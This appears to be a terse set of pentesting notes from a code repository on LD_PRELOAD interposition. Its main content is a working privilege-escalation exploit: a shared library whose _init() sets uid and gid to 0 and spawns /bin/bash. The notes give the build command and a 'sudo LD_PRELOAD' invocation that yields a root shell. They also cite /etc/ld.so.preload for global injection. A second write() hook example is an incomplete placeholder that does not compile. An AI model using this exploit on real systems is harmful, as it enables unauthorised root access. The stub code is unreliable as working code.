1.3 KiB

Raw Blame History

LD_PRELOAD

Preload libs and do interpositioning of functions.
man ld.so
man dlsym, dlsym() calls the original function

Example 1

Interpositioning of _init()

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

gcc -fPIC -shared -o lib.so lib.c -nostartfiles
sudo LD_PRELOAD=lib.so apache2
$ id

Example 2

Interpositioning of write()

#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h> // Contains _GNU_SOURCE from man dlsym
#include <string.h>
ssize_t write(int fildes, const void *buf, size_t nbytes)
{
    ssize_t result;
    do the thing;
    return result;
}

In case the symbol lookup returns an error libdl is linked

gcc -ldl interpositioning.c -fPIC -shared -D _GNU_SOURCE -o interpositioning.so -ldl`

Preloading

Dependent on the installation status of lib32 and/or lib64 and various packages the path of LD_PRELOAD has to be set differently. These may look as follows
LD_PRELOAD=./interpositioning.so <binary> or
export LD_PRELOAD=$(pwd)/interpositioning.so or
Global preload via /etc/ld.so.preload or
Change the preload path via LD_PRELOAD_PATH
Verify via ldd <somebinary>